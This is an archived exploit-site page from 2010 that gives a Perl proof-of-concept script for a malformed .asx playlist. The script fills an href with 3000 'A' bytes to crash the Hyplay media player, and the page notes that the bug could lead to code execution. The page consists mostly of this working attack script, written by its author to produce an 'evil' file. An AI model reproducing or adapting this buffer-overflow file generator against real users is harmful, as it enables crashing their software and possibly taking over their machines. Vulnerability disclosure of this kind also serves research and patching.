Hyplay 1.2.0326.1 (.asx) Local DoS crash PoC
Posted on 10 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Hyplay 1.2.0326.1 (.asx) Local DoS crash PoC</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================ Hyplay 1.2.0326.1 (.asx) Local DoS crash PoC ============================================ #/usr/bin/perl #Title: Hyplay 1.2.0326.1 (.asx) Local DoS crash PoC #Download: http://www.hyplay.com/download.asp #Written/Discovered by: xsploited Security #Tested on Windows XP SP2 #URL: http://x-sploited.com/ #Shoutz: kAoTiX, drizzle, JeremyBrown, BreTT, Deca #A bug exists in the way Hyplay processes malformed .asx play #list files. This could potentially lead to code execution on #the users machine. my $data1= "x3Cx61x73x78x20x76x65x72x73x69x6Fx6Ex20x3Dx20". "x22x33x2Ex30x22x20x3Ex0Dx0Dx0Ax3Cx65x6Ex74x72". "x79x3Ex0Dx0Dx0A". "x3Cx72x65x66x20x68x72x65x66x20x3Dx20x22"; my $data2="http://"; my $data3= #asx file footer "x22x20x2Fx3Ex0Dx0Ax3Cx2Fx65x6Ex74x72x79x3Ex0D". "x0Ax3Cx2Fx61x73x78x3E"; my $junk = "x41" x 3000; open(my $playlist, "> hyplay_d0s.asx"); print $playlist $data1.$data2.$junk.$data3." "; close $playlist; print " Evil asx file created successfully."; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
